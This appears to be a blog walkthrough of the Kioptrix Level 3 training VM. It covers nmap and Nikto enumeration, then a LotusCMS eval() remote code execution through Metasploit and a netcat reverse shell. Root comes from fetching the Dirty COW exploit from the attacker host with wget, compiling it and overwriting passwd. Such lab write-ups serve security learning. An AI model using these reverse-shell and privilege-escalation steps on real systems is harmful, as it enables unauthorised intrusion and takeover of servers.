Kioptrix Level3(#1.3) Walkthrough

This article shows walkthrough of Kioptrix Level3

Enumeration

Nmap

$ ipaddr=192.168.174.146
$ ports=$(nmap -p- --min-rate=1000 -T4 $ipaddr | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$ nmap -sC -sV -p$ports $ipaddr
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-19 23:57 EDT
Nmap scan report for kioptrix3.com (192.168.174.146)
Host is up (0.00039s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds

Target only has started two service, SSH and Web.

Nikto

I use Nikto, but I don't get useful information.

$ nikto -h $ipaddr
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.174.146
+ Target Hostname:    192.168.174.146
+ Target Port:        80
+ Start Time:         2021-09-20 03:52:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2021-09-20 03:53:12 (GMT-4) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Web access

Target hosted blog with LotusCMS.

f:id:kataware8136:20210920205400p:plain

Searchsploit shows some exploit code for LotusCMS.

$ searchsploit Lotus CMS
--------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                             |  Path
--------------------------------------------------------------------------- ---------------------------------
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote Code Execution        | php/webapps/15964.py
Lotus Core CMS 1.0.1 - Local File Inclusion                                | php/webapps/47985.txt
Lotus Core CMS 1.0.1 - Remote File Inclusion                               | php/webapps/5866.txt
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)              | php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities                                  | php/webapps/16982.txt
--------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

OWASP Zap

OWASP Zap shows target has server side code injection vulnerability.

f:id:kataware8136:20210920205243p:plain

I tested the parameter showed by OWASP Zap. Target returns eval error.

f:id:kataware8136:20210920212525p:plain

I guess LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) code can be useful

Exploit

Use metasploit or exploit code published Github by Hood3dRob1n

GitHub - Hood3dRob1n/LotusCMS-Exploit: LotusCMS 3.0 eval() Remote Command Execution

Use Metasploit

First, I use default payload php/meterpreter/reverse_tcp, but it's missed.

$ msfconsole
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __                                                  
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \                                                 
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|                                                
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_                                                
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\                                               
                                                                                                             

       =[ metasploit v6.1.5-dev                           ]
+ -- --=[ 2163 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn more

msf6 > search LotusCMS

Matching Modules
================

   #  Name                              Disclosure Date  Rank       Check  Description
   -  ----                              ---------------  ----       -----  -----------
   0  exploit/multi/http/lcms_php_exec  2011-03-03       excellent  Yes    LotusCMS 3.0 eval() Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/lcms_php_exec

msf6 > use exploit/multi/http/lcms_php_exec 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) >
msf6 exploit(multi/http/lcms_php_exec) > set RHOSTS kioptrix3.com
RHOSTS => kioptrix3.com
msf6 exploit(multi/http/lcms_php_exec) > set URI /
URI => /
msf6 exploit(multi/http/lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.174.132:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Exploit completed, but no session was created.

After miss of exploit, I change the payload php/meterpreter/reverse_tcp to generic/shell_reverse_tcp.

msf6 exploit(multi/http/lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.174.146  yes       The target host(s), see https://github.com/rapid7/metasploit-framewo
                                       rk/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.174.132  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf6 exploit(multi/http/lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.174.132:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.174.132:4444 -> 192.168.174.146:33062) at 2021-09-21 09:53:05 -0400

whoami
www-data

Success!!

Use Hood3dRob1n's Code

lotusRCE.sh requires target IP address and lotus cms's home directory.

Before execute shellcode, prepare waiting port such as nc -l -p 4242.

$./lotusRCE.sh  192.168.174.146 /
Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.174.132
What PORT?
4242

OK, open your local listener and choose the method for back connect: 
1) NetCat -e
2) NetCat /dev/tcp
3) NetCat Backpipe
4) NetCat FIFO
5) Exit
#? 1

After select 1, terminal which prepared for waiting port may be used as shell.

$ nc -l -p 4242
whoami
www-data

Privilege Escalation

Default shell is too inconvenience. I use python to use tty.

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Kioptrix3:/home/www/kioptrix3.com$ 

I collect OS Information. Target machine is Linux kernel 2.6.24.

$ uname -a
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Dirty Cow exploit may be used.(Dirty Cow is worked in Linux Kernel before 3.19.0-73.8).

www-data@Kioptrix3:/home/www/kioptrix3.com$ cd /tmp
www-data@Kioptrix3:/tmp$ wget http://192.168.174.132/40839.c
wget http://192.168.174.132/40839.c
--08:00:03--  http://192.168.174.132/40839.c
           => `40839.c'
Connecting to 192.168.174.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,814 (4.7K) [text/x-csrc]

100%[====================================>] 4,814         --.--K/s             

08:00:03 (884.92 MB/s) - `40839.c' saved [4814/4814]

www-data@Kioptrix3:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
www-data@Kioptrix3:/tmp$ ./dirty password
Complete line:
firefart:fijI1lDcvwk7k:0:0:pwned:/root:/bin/bash

mmap: b7fe0000
$ su firefart
Password: password

firefart@Kioptrix3:/home/www/kioptrix3.com# id
uid=0(firefart) gid=0(root) groups=0(root)

I can get root group. That's all.